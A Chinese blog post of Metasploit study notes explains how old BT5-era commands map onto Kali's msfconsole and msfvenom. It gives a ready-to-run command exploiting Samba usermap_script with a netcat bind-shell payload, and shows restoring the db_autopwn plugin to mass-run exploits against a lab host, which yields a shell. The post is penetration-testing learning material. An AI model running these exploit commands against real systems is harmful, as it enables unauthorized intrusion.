美文网首页
metasploit学习笔记2

metasploit学习笔记2

作者: 会跳的种子 | 来源:发表于2016-01-11 18:28 被阅读547次

    1.阅读老资料的困惑

    老资料里一般是根据BT5整理的,kali里的metasploit比较新,不太一样,这里整理一下。

    a)msfcli被整合进msfconsole的参数里:

    老指令:

    #msfcli multi/samba/usermap_script PAYLOAD=cmd/unix/bind_netcat RHOST=192.168.200.129 E

    新指令:

    #msfconsole -x "use exploit/multi/samba/usermap_script; set RHOST 192.168.200.129; set PAYLOADcmd/unix/bind_netcat; [set LHOST IP;] run"

    b)msfpayload、msfencode被整合到msfvenom里:

    老指令:

    msfpayload -l        #查看所有攻击载荷

    msfencode -l         #查看所有编码器

    新指令只需一条指令即可:

    msfvenom -l payloads,encoders

    下图是msfvenom的参数说明:

    c)db_autopwn自动渗透脚本被删除

    据说是由于该脚本虽然使渗透傻瓜化,但是智能不高,并且造成的负载不小,容易被发现,所以删掉了。

    目前替代的方法是可以使用metasploit的一些自动化插件和脚本,但是更好的方法还是自己选择合适的脚本和载荷,使负载变小,效率更高。

    https://github.com/rapid7/metasploit-framework/tree/master/plugins

    2.db_autopwn傻瓜化测试

    虽然db_autopwn被删掉了,但是可以手工恢复。

    https://github.com/PsychoSpy/metasploit-framework/blob/autopwn-modules/plugins/db_autopwn.rb

    源代码复制下来,保存为db_autopwn.rb文件,复制到/usr/share/metasploit-framwork/plugins/中,然后执行加载

    #msf>load db_autopwn

    渗透测试:

    a)扫描测试机

    #msf>db_nmap -v -A 192.168.200.129

    --测试机的扫描结果会自动存放如Postgresql数据库中

    b)查看扫描结果

    c)自动测试

    #msf>db_autopwn -t -p -r -e          ----负载不小,1000多个脚本都会跑一遍,需要不少时间,好在成功了一个session。

    d)连接会话并测试

    会话连接已经成功,但user是www-data(敲错的指令,请自动忽略),不是root,没关系,至少证明db_autopwn还是管用的。

    相关文章

      网友评论

          本文标题:metasploit学习笔记2

          本文链接:https://www.haomeiwen.com/subject/thoqkttx.html